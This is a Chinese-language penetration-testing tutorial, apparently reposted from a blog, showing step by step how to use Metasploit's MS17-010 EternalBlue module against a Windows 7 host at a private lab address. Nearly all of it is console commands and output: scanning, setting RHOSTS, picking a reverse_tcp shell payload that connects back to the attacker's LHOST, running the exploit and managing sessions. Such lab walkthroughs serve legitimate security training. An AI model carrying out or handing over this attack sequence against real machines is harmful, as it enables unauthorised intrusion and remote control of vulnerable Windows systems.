zoukankan      html  css  js  c++  java
  • metasploit渗透测试

    使用msf渗透Win7主机,并远程执行命令

    整体流程

    已知漏洞→查找模块→配置程序→执行exploit

    查找模块:

    search MS17-...
    show exploits
    show payloads
    show auxiliary
    

    配置程序:

    显示参数:
    show options
    show targets
    show encoders
    show advanced
    info xxx
    ----------
    设置参数:
    use xxx(exploit)
    set xxx(payload)
    set xxx xxx(参数)
    

    执行exploit:

    exploit(命令)
    run(命令)
    

    任务开始

    查找该漏洞的扫描模块

    msf5 > search ms17-010
    ------
    auxiliary/scanner/smb/smb_ms17_010 (这是一个扫描模块)
    

     加载模块

    msf5 > use auxiliary/scanner/smb/smb_ms17_010
    msf5 auxiliary(scanner/smb/smb_ms17_010) >
    

    查看设置哪些参数

    msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
    

    设置目标HOSTS

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.255.150
    

    查看设置的HOSTS

    msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
    RHOSTS       192.168.255.150
    

    执行攻击命令开始扫描该主机

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run
    

    查找该漏洞的攻击模块

    msf5 > search ms17-010
    ---------
    exploit/windows/smb/ms17_010_eternalblue (永恒之蓝)
    

     加载该模块

    msf5 > use exploit/windows/smb/ms17_010_eternalblue
    [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_eternalblue) >
    

    检查要设置的参数

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
    

     设置靶机的HOSTS

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.255.150
    RHOSTS => 192.168.255.150
    

    查看可以复现的系统

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
    
    Exploit targets:
    
       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs
    

    使用攻击载荷(payload)设置本地监听

    msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/shell
    --------
    payload/windows/shell/reverse_tcp
    

    设置攻击载荷(payload)

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/shell/reverse_tcp
    payload => windows/shell/reverse_tcp
    

    显示设置的参数

    设置本地端口和IP

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.255.200 LPORT 4444
    LHOST => 192.168.255.200 LPORT 4444
    

     执行攻击命令

    msf5 exploit(windows/smb/ms17_010_eternalblue) > run
    

    拿到shell后解决乱码问题

    C:Windwossystem32> chcp 65001
    

    Ctrl+C断开连接

    渗透成功之后将会话保存到后台

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
    

      

     查看保存到后台的会话

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
    

    启用这个会话

    session -i [会话ID]

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
    

    进入会话后想返回而不丢失这个会话,[返回并保持到后台]

    C:Windowssystem32>background
    Background session 2? [y/N] y
    

    清理这个会话

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
    [*] Killing the following session(s): 2
    

    show options参数列表说明

    参数解释
    Name 参数名称
    Current Setting 默认值
    Required 是否必须设置
    Description 参数的描述

    总结使用metasploit攻击的步骤

    • 1、查找CVE公布的漏洞

    • 2、查找对应的exploit模块

    • 3、配置模块参数

    • 4、添加payload后门

    • 5、执行exploit开始攻击

  • 相关阅读:
    spring cloud 之config配置
    java HTTP连接 可以结合springcloud服务发布注册
    webStrom的注册码地址
    VUE的富文本编辑器
    vue2.0对于IE9浏览器的兼容
    用花生壳代理出现Invalid Host header错误
    用于时间统计数据的SQL
    Leetcode 136. Single Number
    Leetcode 36. Valid Sudoku
    VS Code
  • 原文地址:https://www.cnblogs.com/MineLSG/p/13780219.html
Copyright © 2011-2022 走看看